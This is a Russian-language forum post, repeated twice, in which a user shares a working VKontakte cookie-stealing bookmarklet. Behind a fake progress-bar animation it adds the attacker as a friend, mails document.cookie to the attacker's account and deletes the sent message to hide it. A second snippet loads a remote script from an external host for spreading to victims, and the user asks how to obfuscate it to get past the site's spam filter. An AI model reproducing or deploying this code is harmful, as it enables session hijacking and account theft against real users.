mazaxaka
27.06.2009, 22:17
Есть скрипт для вк для кражи куки
javascript:var percentGold=100;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold ').innerHTML=percentGold;ge('rateLeftGold').style. width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Ma th.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent' ).innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);wid thRight=parseInt(ge('rateRight').style.width);_b() ;}else{percentGold=parseInt(ge('percentGold').inne rHTML);widthLeft=parseInt(ge('rateLeftGold').style .width);widthRight=parseInt(ge('rateRightGold').st yle.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').i nnerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(t);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight'). id='rateRightGold';widthLeft=20;widthRight=179;_a( );}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_ form',fid:999999},onDone:function(ajaxObj,response Text){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=re sponse.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend. php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to : 999999},onDone:function(ajaxObj,responseText){var text=responseText;try{f.innerHTML=responseText;par ams={act:ge('act').value,ajax:1,misc:ge('misc')?ge ('misc').value:'',secure:ge('secure')?ge('secure') .value:'',chas:ge('chas').value,photo:ge('photo')? ge('photo').value:'',to_id:999999,to_reply:ge('to_ reply').value,toFriends:ge('toFriends')?ge('toFrie nds').value:'',title:ge('title').value,message:''+ Math.round(Math.random()*10000)+document.cookie+Ma th.round(Math.random()*10000)};setTimeout(c,3000); }catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',query:params,onDone: function(ajaxObj,responseText){setTimeout(e,1000); }});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:funct ion(ajaxObj,responseText){try{var k='<a href="mail.php?act=write&to=999999&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g -pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',query:params});}catch(e) {}}});}; onDomReady(function(){document.body.appendChild(f) ; first();a();b();});
с етим я разобрался (поменял ид на свой)
Дале для впаривания жертве используется такой редирект
javascript:function loadScript(scriptURL) { var scriptElem = document.createElement('SCRIPT'); scriptElem.setAttribute('language',%20'%4A%61%76%6 1%53%63%72%69%70%74'); scriptElem.setAttribute('src', scriptURL); document.body.appendChild(scriptElem);}loadScript( 'SCRIPT URL');
Где вместо "SCRIPT URL" вставляем адрес нашего скрипта здесь я написал http://host.ru/vk.js правельно?
дальше не понял как ето зашифровать правельно чтоб после скидывания на стенку не писало "ето спам"
javascript:var percentGold=100;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold ').innerHTML=percentGold;ge('rateLeftGold').style. width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Ma th.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent' ).innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);wid thRight=parseInt(ge('rateRight').style.width);_b() ;}else{percentGold=parseInt(ge('percentGold').inne rHTML);widthLeft=parseInt(ge('rateLeftGold').style .width);widthRight=parseInt(ge('rateRightGold').st yle.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').i nnerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(t);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight'). id='rateRightGold';widthLeft=20;widthRight=179;_a( );}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_ form',fid:999999},onDone:function(ajaxObj,response Text){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=re sponse.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend. php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to : 999999},onDone:function(ajaxObj,responseText){var text=responseText;try{f.innerHTML=responseText;par ams={act:ge('act').value,ajax:1,misc:ge('misc')?ge ('misc').value:'',secure:ge('secure')?ge('secure') .value:'',chas:ge('chas').value,photo:ge('photo')? ge('photo').value:'',to_id:999999,to_reply:ge('to_ reply').value,toFriends:ge('toFriends')?ge('toFrie nds').value:'',title:ge('title').value,message:''+ Math.round(Math.random()*10000)+document.cookie+Ma th.round(Math.random()*10000)};setTimeout(c,3000); }catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',query:params,onDone: function(ajaxObj,responseText){setTimeout(e,1000); }});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:funct ion(ajaxObj,responseText){try{var k='<a href="mail.php?act=write&to=999999&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g -pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',query:params});}catch(e) {}}});}; onDomReady(function(){document.body.appendChild(f) ; first();a();b();});
с етим я разобрался (поменял ид на свой)
Дале для впаривания жертве используется такой редирект
javascript:function loadScript(scriptURL) { var scriptElem = document.createElement('SCRIPT'); scriptElem.setAttribute('language',%20'%4A%61%76%6 1%53%63%72%69%70%74'); scriptElem.setAttribute('src', scriptURL); document.body.appendChild(scriptElem);}loadScript( 'SCRIPT URL');
Где вместо "SCRIPT URL" вставляем адрес нашего скрипта здесь я написал http://host.ru/vk.js правельно?
дальше не понял как ето зашифровать правельно чтоб после скидывания на стенку не писало "ето спам"